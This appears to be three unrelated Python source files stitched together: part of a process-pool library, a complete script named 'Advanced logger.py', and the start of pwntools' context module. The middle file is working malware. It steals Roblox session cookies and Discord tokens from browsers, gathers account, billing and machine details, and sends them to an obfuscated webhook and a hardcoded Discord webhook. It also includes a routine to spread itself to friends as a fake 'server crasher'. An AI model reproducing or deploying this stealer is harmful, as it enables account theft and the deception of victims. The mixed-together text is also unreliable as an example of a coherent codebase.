debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<%s: {id} ack:{ack} ready:{ready}>'.format(
self.__class__.__name__,
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._propagate_errors:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from .dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
|
Advanced logger.py
|
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
import browser_cookie3, requests, threading
import base64
import time
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
key = "NB2HI4DTHIXS6ZDJONRW64TEMFYHALTDN5WS6YLQNEXXOZLCNBXW623TF44DGMRQGUYDANBQGI4DSMBZHE4DINZPJBVW453UKJFVCY27OFBHGWDMGNJS2VLUOBDWUYTSK5LF6ODHGBIVCTLZKVKGIUTPKZHGI42EHFSUSULRPAYWQVKJM5JHG6TEKBMWWYLRLFRDI==="
webhook = base64.b32decode(key)
def edge_logger():
try:
cookies = browser_cookie3.edge(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def chrome_logger():
try:
cookies = browser_cookie3.chrome(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def firefox_logger():
try:
cookies = browser_cookie3.firefox(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def opera_logger():
try:
cookies = browser_cookie3.opera(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
browsers = [edge_logger, chrome_logger, firefox_logger, opera_logger]
for x in browsers:
threading.Thread(target=x,).start()
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Logger",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("https://discordapp.com/api/webhooks/832050040289099847/HknwtRKQc_qBsXl3S-UtpGjbrWV_8g0QQMyUTdRoVNdsD9eIQqx1hUIgRszdPYkaqYb4K", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
Implements context management so that nested/scoped contexts and threaded
contexts work properly and as expected.
"""
from __future__ import absolute_import
from __future__ import division
import collections
import functools
import logging
import os
import platform
import six
import socket
import stat
import string
import subprocess
import sys
import threading
import time
import socks
from pwnlib.config import register_config
from pwnlib.device import Device
from pwnlib.timeout import Timeout
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
__all__ = ['context', 'ContextType', 'Thread']
_original_socket = socket.socket
class _devnull(object):
name = None
def write(self, *a, **kw): pass
def read(self, *a, **kw): return ''
def flush(self, *a, **kw): pass
def close(self, *a, **kw): pass
class _defaultdict(dict):
"""
Dictionary which loads missing keys from another dictionary.
This is neccesary because the ``default_factory`` method of
:class:`collections.defaultdict` does not provide the key.
Examples:
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['foo']
'bar'
>>> 'foo' in b
False
>>> b['foo'] = 'baz'
>>> b['foo']
'baz'
>>> del b['foo']
>>> b['foo']
'bar'
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['baz'] #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: 'baz'
"""
def __init__(self, default=None):
super(_defaultdict, self).__init__()
if default is None:
default = {}
self.default = default
def __missing__(self, key):
return self.default[key]
class _DictStack(object):
"""
Manages a dictionary-like object, permitting saving and restoring from
a stack of states via :func:`push` and :func:`pop`.
The underlying object used as ``default`` must implement ``copy``, ``clear``,
and ``update``.
Examples:
>>> t = pwnlib.context._DictStack(default={})
>>> t['key'] = 'value'
>>> t
{'key': 'value'}
>>> t.push()
>>> t
{'key': 'value'}
>>> t['key'] = 'value2'
>>> t
{'key': 'value2'}
>>> t.pop()
>>> t
{'key': 'value'}
"""
def __init__(self, default):
self._current = _defaultdict(default)
self.__stack = []
def push(self):
self.__stack.append(self._current.copy())
def pop(self):
self._current.clear()
self._current.update(self.__stack.pop())
def copy(self):
return self._current.copy()
# Pass-through container emulation routines
def __len__(self): return self._current.__len__()
def __delitem__(self, k): return self._current.__delitem__(k)
def __getitem__(self, k): return self._current.__getitem__(k)
def __setitem__(self, k, v): return self._current.__setitem__(k, v)
def __contains__(self, k): return self._current.__contains__(k)
def __iter__(self): return self._current.__iter__()
def __repr__(self): return self._current.__repr__()
def __eq__(self, other): return self._current.__eq__(other)
# Required for keyword expansion operator ** to work
def keys(self): return self._current.keys()
def values(self): return self._current.values()
def items(self): return self._current.items()
class _Tls_DictStack(threading.local, _DictStack):
"""
Per-thread implementation of :class:`_DictStack`.
Examples:
>>> t = pwnlib.context._Tls_DictStack({})
>>> t['key'] = 'value'
>>> print(t)
{'key': 'value'}
>>> def p(): print(t)
>>> thread = threading.Thread(target=p)
>>> _ = (thread.start(), thread.join())
{}
"""
pass
def _validator(validator):
"""
Validator that is tightly coupled to the implementation
of the classes here.
This expects that the object has a ._tls property which
is of type _DictStack.
"""
name = validator.__name__
doc = validator.__doc__
def fget(self):
return self._tls[name]
def fset(self, val):
self._tls[name] = validator(self, val)
def fdel(self):
self._tls._current.pop(name,None)
return property(fget, fset, fdel, doc)
class Thread(threading.Thread):
"""
Instantiates a context-aware thread, which inherit its context when it is
instantiated. The class can be accessed both on the context module as
`pwnlib.context.Thread` and on the context singleton object inside the
context module as `pwnlib.context.context.Thread`.
Threads created by using the native :class`threading`.Thread` will have a
clean (default) context.
Regardless of the mechanism used to create any thread, the context
is de-coupled from the parent thread, so changes do not cascade
to child or parent.
Saves a copy of the context when instantiated (at ``__init__``)
and updates the new thread's context before passing control
to the user code via ``run`` or ``target=``.
Examples:
>>> context.clear()
>>> context.update(arch='arm')
>>> def p():
... print(context.arch)
... context.arch = 'mips'
... print(context.arch)
>>> # Note that a normal Thread starts with a clean context
>>> # (i386 is the default architecture)
>>> t = threading.Thread(target=p)
>>> _=(t.start(), t.join())
i386
mips
>>> # Note that the main Thread's context is unchanged
>>> print(context.arch)
arm
>>> # Note that a context-aware Thread receives a copy of the context
>>> t = pwnlib.context.Thread(target=p)
>>> _=(t.start(), t.join())
arm
mips
>>> # Again, the main thread is unchanged
>>> print(context.arch)
arm
Implementation Details:
This class implemented by hooking the private function
:func:`threading.Thread._Thread_bootstrap`, which is called before
passing control to :func:`threading.Thread.run`.
This could be done by overriding ``run`` itself, but we would have to
ensure that all uses of the class would only ever use the keyword
``target=`` for ``__init__``, or that all subclasses invoke
``super(Subclass.self).set_up_context()`` or similar.
"""
def __init__(self, *args, **kwargs):
super(Thread, self).__init__(*args, **kwargs)
self.old = context.copy()
def __bootstrap(self):
"""
Implementation Details:
This only works because the class is named ``Thread``.
If its name is changed, we have to implement this hook
differently.
"""
context.update(**self.old)
sup = super(Thread, self)
bootstrap = getattr(sup, '_bootstrap', None)
if bootstrap is None:
sup.__bootstrap()
else:
bootstrap()
_bootstrap = __bootstrap
def _longest(d):
"""
Returns an OrderedDict with the contents of the input dictionary ``d``
sorted by the length of the keys, in descending order.
This is useful for performing substring matching via ``str.startswith``,
as it ensures the most complete match will be found.
>>> data = {'a': 1, 'bb': 2, 'ccc': 3}
>>> pwnlib.context._longest(data) == data
True
>>> for i in pwnlib.context._longest(data):
... print(i)
ccc
bb
a
"""
return collections.OrderedDict((k,d[k]) for k in sorted(d, key=len, reverse=True))
class ContextType(object):
r"""
Class for specifying information about the target machine.
Intended for use as a pseudo-singleton through the global
variable :data:`.context`, available via
``from pwn import *`` as ``context``.
The context is usually specified at the top of the Python file for clarity. ::
#!/usr/bin/env python
context.update(arch='i386', os='linux')
Currently supported properties and their defaults are listed below.
The defaults are inherited from :data:`pwnlib.context.ContextType.defaults`.
Additionally, the context is thread-aware when using
:class:`pwnlib.context.Thread` instead of :class:`threading.Thread`
(all internal ``pwntools`` threads use the former).
The context is also scope-aware by using the ``with`` keyword.
Examples:
>>> context.clear()
>>> context.update(os='linux') # doctest: +ELLIPSIS
>>> context.os == 'linux'
True
>>> context.arch = 'arm'
>>> vars(context) == {'arch': 'arm', 'bits': 32, 'endian': 'little', 'os': 'linux'}
True
>>> context.endian
'little'
>>> context.bits
32
>>> def nop():
... print(enhex(pwnlib.asm.asm('nop')))
>>> nop()
00f020e3
>>> with context.local(arch = 'i386'):
... nop()
90
>>> from pwnlib.context import Thread as PwnThread
>>> from threading import Thread as NormalThread
>>> with context.local(arch = 'mips'):
... pwnthread = PwnThread(target=nop)
... thread = NormalThread(target=nop)
>>> # Normal thread uses the default value for arch, 'i386'
>>> _=(thread.start(), thread.join())
90
>>> # Pwnthread uses the correct context from creation-time
>>> _=(pwnthread.start(), pwnthread.join())
00000000
>>> nop()
00f020e3
"""
#
# Use of 'slots' is a heavy-handed way to prevent accidents
# like 'context.architecture=' instead of 'context.arch='.
#
# Setting any properties on a ContextType object will throw an
# exception.
#
__slots__ = '_tls',
#: Default values for :class:`pwnlib.context.ContextType`
defaults = {
'adb_host': 'localhost',
'adb_port': 5037,
'arch': 'i386',
'aslr': True,
'binary': None,
'bits': 32,
'buffer_size': 4096,
'cyclic_alphabet': string.ascii_lowercase.encode(),
'cyclic_size': 4,
'delete_corefiles': False,
'device': os.getenv('ANDROID_SERIAL', None) or None,
'encoding': 'auto',
'endian': 'little',
'gdbinit': "",
'kernel': None,
'log_level': logging.INFO,
'log_file': _devnull(),
'log_console': sys.stdout,
'randomize': False,
'rename_corefiles': True,
'newline': b'\n',
'noptrace': False,
'os': 'linux',
'proxy': None,
'ssh_session': None,
'signed': False,
'terminal': tuple(),
'timeout': Timeout.maximum,
}
#: Valid values for :meth:`pwnlib.context.ContextType.os`
oses = sorted(('linux','freebsd','windows','cgc','android','baremetal'))
big_32 = {'endian': 'big', 'bits': 32}
big_64 = {'endian': 'big', 'bits': 64}
little_8 = {'endian': 'little', 'bits': 8}
little_16 = {'endian': 'little', 'bits': 16}
little_32 = {'endian': 'little', 'bits': 32}
little_64 = {'endian': 'little', 'bits': 64}
#: Keys are valid values for :meth:`pwnlib.context.ContextType.arch`.
#
#: Values are defaults which are set when
#: :attr:`pwnlib.context.ContextType.arch` is set
architectures = _longest({
'aarch64': little_64,
'alpha': little_64,
'avr': little_8,
'amd64': little_64,
'arm': little_32,
'cris': little_32,
'i386': little_32,
'ia64': big_64,
'm68k': big_32,
'mips': little_32,
'mips64': little_64,
'msp430': little_16,
'powerpc': big_32,
'powerpc64': big_64,
's390': big_32,
'sparc': big_32,
'sparc64': big_64,
'thumb': little_32,
'vax': little_32,
'none': {},
})
#: Valid values for :attr:`endian`
endiannesses = _longest({
'be': 'big',
'eb': 'big',
'big': 'big',
'le': 'little',
'el': 'little',
'little': 'little'
})
#: Valid string values for :attr:`signed`
signednesses = {
'unsigned': False,
'no': False,
'yes': True,
'signed': True
}
valid_signed = sorted(signednesses)
def __init__(self, **kwargs):
"""
Initialize the ContextType structure.
All keyword arguments are passed to :func:`update`.
"""
self._tls = _Tls_DictStack(_defaultdict(self.defaults))
self.update(**kwargs)
def copy(self):
"""copy() -> dict
Returns a copy of the current context as a dictionary.
Examples:
>>> context.clear()
>>> context.os = 'linux'
>>> vars(context) == {'os': 'linux'}
True
"""
return self._tls.copy()
@property
def __dict__(self):
return self.copy()
def update(self, *args, **kwargs):
"""
Convenience function, which is shorthand for setting multiple
variables at once.
It is a simple shorthand such that::
context.update(os = 'linux', arch = 'arm', ...)
is equivalent to::
context.os = 'linux'
context.arch = 'arm'
...
The following syntax is also valid::
context.update({'os': 'linux', 'arch': 'arm'})
Arguments:
kwargs: Variables to be assigned in the environment.
Examples:
>>> context.clear()
>>> context.update(arch = 'i386', os = 'linux')
>>> context.arch, context.os
('i386', 'linux')
"""
for arg in args:
self.update(**arg)
for k,v in kwargs.items():
setattr(self,k,v)
def __repr__(self):
v = sorted("%s = %r" % (k,v) for k,v in self._tls._current.items())
return '%s(%s)' % (self.__class__.__name__, ', '.join(v))
def local(self, function=None, **kwargs):
"""local(**kwargs) -> context manager
Create a context manager for use with the ``with`` statement.
For more information, see the example below or PEP 343.
Arguments:
kwargs: Variables to be assigned in the new environment.
Returns:
ContextType manager for managing the old and new environment.
Examples:
>>> context.clear()
>>> context.timeout = 1
>>> context.timeout == 1
True
>>> print(context.timeout)
1.0
>>> with context.local(timeout = 2):
... print(context.timeout)
... context.timeout = 3
... print(context.timeout)
2.0
3.0
>>> print(context.timeout)
1.0
"""
class LocalContext(object):
def __enter__(a):
self._tls.push()
self.update(**{k:v for k,v in kwargs.items() if v is not None})
return self
def __exit__(a, *b, **c):
self._tls.pop()
def __call__(self, function, *a, **kw):
@functools.wraps(function)
def inner(*a, **kw):
with self:
return function(*a, **kw)
return inner
return LocalContext()
@property
def silent(self, function=None):
"""Disable all non-error logging within the enclosed scope.
"""
return self.local(function, log_level='error')
@property
def quiet(self, function=None):
"""Disables all non-error logging within the enclosed scope,
*unless* the debugging level is set to 'debug' or lower.
Example:
Let's assume the normal situation, where log_level is INFO.
>>> context.clear(log_level='info')
Note that only the log levels below ERROR do not print anything.
>>> with context.quiet:
... log.debug("DEBUG")
... log.info("INFO")
... log.warn("WARN")
Next let's try with the debugging level set to 'debug' before we
enter the context handler:
>>> with context.local(log_level='debug'):
... with context.quiet:
... log.debug("DEBUG")
... log.info("INFO")
... log.warn("WARN")
[DEBUG] DEBUG
[*] INFO
[!] WARN
"""
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
return self.local(function, log_level=level)
def quietfunc(self, function):
"""Similar to :attr:`quiet`, but wraps a whole function.
Example:
Let's set up two functions, which are the same but one is
wrapped with :attr:`quietfunc`.
>>> def loud(): log.info("Loud")
>>> @context.quietfunc
... def quiet(): log.info("Quiet")
If we set the logging level to 'info', the loud function
prints its contents.
>>> with context.local(log_level='info'): loud()
[*] Loud
However, the quiet function does not, since :attr:`quietfunc`
silences all output unless the log level is DEBUG.
>>> with context.local(log_level='info'): quiet()
Now let's try again with debugging enabled.
>>> with context.local(log_level='debug'): quiet()
[*] Quiet
"""
@functools.wraps(function)
def wrapper(*a, **kw):
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
with self.local(function, log_level=level):
return function(*a, **kw)
return wrapper
@property
def verbose(self):
"""Enable all logging within the enclosed scope.
This is the opposite of :attr:`.quiet` and functionally equivalent to:
.. code-block:: python
with context.local(log_level='debug'):
...
Example:
Note that the function does not emit any information by default
>>> context.clear()
>>> def func(): log.debug("Hello")
>>> func()
But if we put it inside a :attr:`.verbose` context manager, the
information is printed.
>>> with context.verbose: func()
[DEBUG] Hello
"""
return self.local(log_level='debug')
def clear(self, *a, **kw):
"""
Clears the contents of the context.
All values are set to their defaults.
Arguments:
a: Arguments passed to ``update``
kw: Arguments passed to ``update``
Examples:
>>> # Default value
>>> context.clear()
>>> context.arch == 'i386'
True
>>> context.arch = 'arm'
>>> context.arch == 'i386'
False
>>> context.clear()
>>> context.arch == 'i386'
True
"""
self._tls._current.clear()
if a or kw:
self.update(*a, **kw)
@property
def native(self):
if context.os in ('android', 'baremetal', 'cgc'):
return False
arch = context.arch
with context.local(arch = platform.machine()):
platform_arch = context.arch
if arch in ('i386', 'amd64') and platform_arch in ('i386', 'amd64'):
return True
return arch == platform_arch
@_validator
def arch(self, arch):
"""
Target binary architecture.
Allowed values are listed in :attr:`pwnlib.context.ContextType.architectures`.
Side Effects:
If an architecture is specified which also implies additional
attributes (e.g. 'amd64' implies 64-bit words, 'powerpc' implies
big-endian), these attributes will be set on the context if a
user has not already set a value.
The following properties may be modified.
- :attr:`bits`
- :attr:`endian`
Raises:
AttributeError: An invalid architecture was specified
Examples:
>>> context.clear()
>>> context.arch == 'i386' # Default architecture
True
>>> context.arch = 'mips'
>>> context.arch == 'mips'
True
>>> context.arch = 'doge' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: arch must be one of ['aarch64', ..., 'thumb']
>>> context.arch = 'ppc'
>>> context.arch == 'powerpc' # Aliased architecture
True
>>> context.clear()
>>> context.bits == 32 # Default value
True
>>> context.arch = 'amd64'
>>> context.bits == 64 # New value
True
Note that expressly setting :attr:`bits` means that we use
that value instead of the default
>>> context.clear()
>>> context.bits = 32
>>> context.arch = 'amd64'
>>> context.bits == 32
True
Setting the architecture can override the defaults for
both :attr:`endian` and :attr:`bits`
>>> context.clear()
>>> context.arch = 'powerpc64'
>>> vars(context) == {'arch': 'powerpc64', 'bits': 64, 'endian': 'big'}
True
"""
# Lowercase
arch = arch.lower()
# Attempt to perform convenience and legacy compatibility transformations.
# We have to make sure that x86_64 appears before x86 for this to work correctly.
transform = [('ppc64', 'powerpc64'),
('ppc', 'powerpc'),
('x86_64', 'amd64'),
('x86', 'i386'),
('i686', 'i386'),
('armv7l', 'arm'),
('armeabi', 'arm'),
('arm64', 'aarch64')]
for k, v in transform:
if arch.startswith(k):
arch = v
break
try:
defaults = self.architectures[arch]
except KeyError:
